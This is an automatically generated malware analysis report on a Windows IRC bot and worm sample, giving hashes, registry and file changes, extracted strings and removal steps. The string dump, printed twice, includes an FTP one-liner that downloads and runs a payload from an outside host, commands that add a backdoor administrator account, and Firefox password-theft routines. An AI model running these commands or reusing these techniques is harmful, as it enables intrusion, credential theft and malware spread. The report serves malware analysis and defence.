Trojan.GenericKD.1886439_8b6d5159d0
Trojan.Win32.Blazebot.wg (Kaspersky), Trojan.GenericKD.1886439 (AdAware), GenericMSNWorm.YR, GenericAutorunWorm.YR, GenericIRCBot.YR, GenericProxy.YR, Blazebot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun, IRCBot, MSNWorm, Trojan-Proxy
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 8b6d5159d05203dbcd918e23130c1f03
SHA1: f0105c43b1a6adcb5aa5f880832db48c17c8cf11
SHA256: 958b4a490fbeeac6b63c83dfdbb76cc35c84462686722f6d21e0e33de9c64b79
SSDeep: 12288:qK2mhAMJ/cPlMPZXEVgc6RQwJT CFr6oKzVsmbggK:b2O/GlMBXEkJZSB
Size: 492295 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2012-06-09 16:19:49
Analyzed on: WindowsXPESX SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through the MSN Messanger. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:1716
The Trojan injects its code into the following process(es):
csrss.exe:556
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:1716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\T47T\explorer.exe (11049 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\T47T\__tmp_rar_sfx_access_check_1410140 (0 bytes)
Registry activity
The process %original file name%.exe:1716 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 FF D5 D2 52 C2 60 D2 3E CE B2 E2 D3 C8 6A 99"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\T47T]
"explorer.exe" = "explorer"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Dropped PE files
| MD5 | File path |
|---|---|
| 1f3de326e835bcf6941ff80545a091fa | c:\Documents and Settings\"%CurrentUserName%"\T47T\explorer.exe |
| 1f3de326e835bcf6941ff80545a091fa | c:\WINDOWS\csrss.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
A worm can spread its copies through the MSN Messanger.
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 74526 | 74752 | 4.54396 | a8692f5ba740240ef0f9a827376f76f9 |
| .rdata | 81920 | 7445 | 7680 | 3.46159 | d4f36accffde0bf520f52486679ccf0d |
| .data | 90112 | 96036 | 512 | 2.46008 | b6c7edb5b7fec47a37a622cc5d71f3f4 |
| .CRT | 188416 | 32 | 512 | 0.273198 | 439411041ee0b8261668525c5c132cd9 |
| .rsrc | 192512 | 16660 | 16896 | 3.19442 | b3db6d4531777a0cd349227e87f007ab |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
No activity has been detected.
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Web Traffic was not found.
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open newftps.pro-ppl.biz 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
PTF://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}{iNF-%s-%s-%s-%s-%s}nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
newftps.pro-ppl.biz
rundat.exe
videos.pro-ppl.biz
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
hXXp://VVV.whatismyip.com
hXXp://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
192.168.1.128
csrss.exe_556_rwx_00400000_0005A000:
.text
`.rdata
@.data
.rsrc
t1SSSSh
SSSh8
PSShB
msn.msg
msn.stop
login
firefox
join
USERENV.dll
VkKeyScanA
keybd_event
USER32.dll
ole32.dll
OLEAUT32.dll
TransactNamedPipe
GetWindowsDirectoryA
KERNEL32.dll
MSVCRT.dll
_acmdln
RegCloseKey
RegOpenKeyExA
RegCreateKeyExA
ADVAPI32.dll
WS2_32.dll
ntpass
Exploit FTPD: %d, Total: %d.
%s: %d,
%s Exploit Statistics:
cmd /c echo open newftps.pro-ppl.biz 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s Scan not active.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Advapi.dll Failed
PStore.dll Failed.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
PTF://%s:%s@%s:%s/%s path: %s
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Starting firefox pstore
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
File executed: %s
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 2195
PK11_CheckUserPassword
PK11_GetInternalKeySlot
softokn3.dll
sqlite3.dll
nssutil3.dll
plds4.dll
nspr4.dll
mozcrt19.dll
nss3.dll
plc4.dll
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
Application Data\Mozilla\Firefox
signons3.txt
signons2.txt
signons1.txt
pipe\epmapper
\\%s\
Windows 5.1
Windows 5.0
Windows 2000 LAN Manager*
NT LAN Manager *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
200 PORT command successful.
PORT
%s %s LIST request from: %s
425 Passive not supported on this server
215 StnyFtpd
331 Password required
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Login list completed!
<%i> %s!%s@%s
Logins:
USER TbT * 0 :%s
NICK %s
{%s-%s-%s-%s-%s}{iNF-%s-%s-%s-%s-%s}nigzss.txt
TskMultiChatForm.UnicodeClass
__oxFrame.class__
PASS %s
QUIT %s
PONG %s
NICK
PRIVMSG
JOIN
NOTICE %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s %s
PART %s
[%s|%s]
shlwapi.dll
pstorec.dll
psapi.dll
userenv.dll
SQLDisconnect
SQLFreeHandle
SQLAllocHandle
SQLExecDirect
SQLSetEnvAttr
SQLDriverConnect
odbc32.dll
ShellExecuteA
shell32.dll
mpr.dll
GetUdpTable
GetTcpTable
iphlpapi.dll
dnsapi.dll
netapi32.dll
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetOpenUrlA
FtpPutFileA
FtpGetFileA
HttpSendRequestA
HttpOpenRequestA
wininet.dll
ws2_32.dll
RegEnumKeyExA
advapi32.dll
user32.dll
kernel32.dll
%s!%s@%s
NICK {%s-%s-%s-%s-%s}https:/
http:/
csrss.exe
*!*@fbi.edu
||FTP||
newftps.pro-ppl.biz
rundat.exe
videos.pro-ppl.biz
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s Done @ (%iKB Sec)
No %s thread found.
%s thread stopped.
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}\Desktop.ini
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
hXXp://VVV.whatismyip.com
hXXp://checkip.dyndns.org
del "%s">nul
if exist "%s" goto Repeat
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
192.168.1.128
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1716
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\T47T\explorer.exe (11049 bytes)
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
